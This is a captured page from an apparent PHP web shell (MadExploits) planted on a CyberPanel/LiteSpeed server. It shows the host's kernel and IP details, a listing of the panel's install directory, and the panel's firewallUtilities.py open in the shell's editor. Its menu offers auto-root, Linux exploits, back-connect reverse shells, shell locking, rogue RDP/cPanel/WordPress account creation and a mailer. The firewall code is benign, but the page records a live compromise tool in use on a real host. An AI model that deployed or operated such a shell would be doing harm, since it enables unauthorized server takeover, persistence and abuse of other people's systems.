Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
CyberCP /
install /
[ HOME SHELL ]
Name
Size
Permission
Action
dns
[ DIR ]
drwxr-xr-x
dns-one
[ DIR ]
drwxr-xr-x
email-configs
[ DIR ]
drwxr-xr-x
email-configs-one
[ DIR ]
drwxr-xr-x
gun-configs
[ DIR ]
drwxr-xr-x
litespeed
[ DIR ]
drwxr-xr-x
lscpd
[ DIR ]
drwxr-xr-x
mysql
[ DIR ]
drwxr-xr-x
php-configs
[ DIR ]
drwxr-xr-x
phpconfigs
[ DIR ]
drwxr-xr-x
pure-ftpd
[ DIR ]
drwxr-xr-x
pure-ftpd-one
[ DIR ]
drwxr-xr-x
rainloop
[ DIR ]
drwxr-xr-x
CyberPanel8.repo
133
B
-rw-r--r--
__init__.py
0
B
-rw-r--r--
composer.sh
190
B
-rw-r--r--
composer_cn.sh
363
B
-rw-r--r--
cyberso.pub
386
B
-rw-r--r--
dns_cyberpanel.sh
1.68
KB
-rw-r--r--
env_generator.py
8.13
KB
-rw-r--r--
filesPermsUtilities.py
6.17
KB
-rw-r--r--
filesPermsUtilities.py.bak
6.17
KB
-rw-r--r--
firewallUtilities.py
3.03
KB
-rw-r--r--
install.py
124.6
KB
-rw-r--r--
install.py.bak
92.74
KB
-rw-r--r--
install.xml
512
B
-rw-r--r--
installCyberPanel.py
45.88
KB
-rw-r--r--
installLog.py
1.06
KB
-rw-r--r--
install_utils.py
12.75
KB
-rw-r--r--
lscp.tar.gz
36.19
MB
-rw-r--r--
mysqlUtilities.py
3.21
KB
-rw-r--r--
postfix-files
20.76
KB
-rw-r--r--
randomPassword.py
364
B
-rw-r--r--
setup_env.py
3.22
KB
-rw-r--r--
test.py
0
B
-rw-r--r--
unInstall.py
4.73
KB
-rw-r--r--
venvsetup.sh
41.49
KB
-rw-r--r--
venvsetup.sh.bak
41
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : firewallUtilities.py
import subprocess import shlex class FirewallUtilities: @staticmethod def doCommand(command): import install as inst try: cmd = shlex.split(command) res = subprocess.call(cmd) if inst.preFlightsChecks.resFailed(inst.get_distro(), res): inst.preFlightsChecks.stdOut("Failed to apply rule: " + command + " Error #" + str(res), 1) return 0 except OSError as msg: inst.preFlightsChecks.stdOut("Failed to apply rule: " + command + " Error: " + str(msg), 1) return 0 except ValueError as msg: inst.preFlightsChecks.stdOut("Failed to apply rule: " + command + " Error: " + str(msg), 1) return 0 return 1 @staticmethod def addRule(proto,port): print('Adding port: %s' % (port)) if port == "21": command = "sudo firewall-cmd --add-service=ftp --permanent" else: ipAddress = "0.0.0.0/0" ruleFamily = 'rule family="ipv4"' sourceAddress = 'source address="' + ipAddress + '"' ruleProtocol = 'port protocol="' + proto + '"' rulePort = 'port="' + port + '"' command = "sudo firewall-cmd --permanent --zone=public --add-rich-rule='" + ruleFamily + " " + sourceAddress + " " + ruleProtocol + " " + rulePort + " " + "accept'" if not FirewallUtilities.doCommand(command): return 0 ruleFamily = 'rule family="ipv6"' sourceAddress = '' command = "sudo firewall-cmd --permanent --zone=public --add-rich-rule='" + ruleFamily + " " + sourceAddress + " " + ruleProtocol + " " + rulePort + " " + "accept'" if not FirewallUtilities.doCommand(command): return 0 command = 'sudo firewall-cmd --reload' if not FirewallUtilities.doCommand(command): return 0 return 1 @staticmethod def deleteRule(proto, port): if port=="21": command = "sudo firewall-cmd --remove-service=ftp --permanent" else: ipAddress = "0.0.0.0/0" ruleFamily = 'rule family="ipv4"' sourceAddress = 'source address="' + ipAddress + '"' ruleProtocol = 'port protocol="' + proto + '"' rulePort = 'port="' + port + '"' command = "sudo firewall-cmd --permanent --zone=public --remove-rich-rule='" + ruleFamily + " " + sourceAddress + " " + ruleProtocol + " " + rulePort + " " + "accept'" if not FirewallUtilities.doCommand(command): return 0 ruleFamily = 'rule family="ipv6"' sourceAddress = '' command = "sudo firewall-cmd --permanent --zone=public --remove-rich-rule='" + ruleFamily + " " + sourceAddress + " " + ruleProtocol + " " + rulePort + " " + "accept'" if not FirewallUtilities.doCommand(command): return 0 command = 'sudo firewall-cmd --reload' if not FirewallUtilities.doCommand(command): return 0 return 1
Close